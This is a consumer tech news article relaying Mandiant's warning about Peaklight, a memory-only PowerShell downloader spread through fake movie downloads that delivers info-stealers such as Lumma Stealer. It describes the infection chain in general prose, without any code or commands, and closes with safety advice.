Are you downloading a free movie? You may become a victim of “Peaklight”: what is it and how does it work

A recent warning issued by Google cybersecurity firm Mandiant highlights a new strain of malware called Peaklight that specifically targets people downloading pirated movies. This malware poses serious risks, not only due to potential legal issues, but also exposure to malware that can seriously compromise Windows computers.

What is Peaklight malware?

According to a blog post by Mandiant (via Times of India ), Peaklight runs secretly in computer memory, making it difficult to detect because it leaves no trace on the hard drive. Researchers describe it as a memory-only dropper that runs a PowerShell-based downloader called PEAKLIGHT. This downloader can download additional malware to the compromised system, increasing the risk to users.

Read also: Smart replies powered by Google Gemini come to Gmail – all the details

Mandiant explains that Peaklight uses a hidden PowerShell script to inject more malware onto infected devices. This approach allows cybercriminals to deliver a variety of malicious programs, including Lumma Stealer, Hijack Loader, and CryptBot. These programs are available as services for rent, allowing attackers to steal sensitive data or take control of the affected systems.

How cybercriminals use Peaklight

Cyber ​​criminals have developed a tactic to distribute Peaklight through deceptive video downloads. They hide dangerous Windows shortcut (LNK) files in ZIP folders disguised as popular videos. When a user opens these files, a series of malicious actions occur:

Read also: Apple October 2024 Event: New M4 Macs and iPads Expected; iPhone SE 4, Watch SE 3 will appear in 2025

1. Connection to the Hidden Source: The LNK file establishes a link to a content delivery network (CDN) from where it downloads malicious JavaScript code. This code is executed directly in the computer’s memory, bypassing detection on the hard drive.

2. Downloader activation: The JavaScript runs a PowerShell script called Peaklight, setting off a chain reaction that facilitates the spread of malware.

3. Downloading additional threats: Acting as a downloader, Peaklight downloads further malware from the remote server, including programs such as Lumma Stealer, Hijack Loader, and CryptBot, which can compromise user data or give attackers control of the system.

Read also: WhatsApp users will soon get filters in the app’s built-in camera – here’s what we know

The report highlights that running Peaklight in computer memory (RAM) increases its invisibility. Traditional antivirus solutions often focus on scanning the hard drive, which makes it difficult to detect these types of threats.

Mandiant researchers Aaron Lee and Praveeth D’Souza state: “PEAKLIGHT is a PowerShell-based obfuscated downloader that is part of a multi-step execution chain that checks for the presence of ZIP archives in hardcoded file paths. If these archives are not present, the downloader contacts the CDN site to download the remotely hosted archive file and save it to disk.

Users are advised to exercise caution when downloading content from unauthorized sources to avoid falling victim to malware such as Peaklight.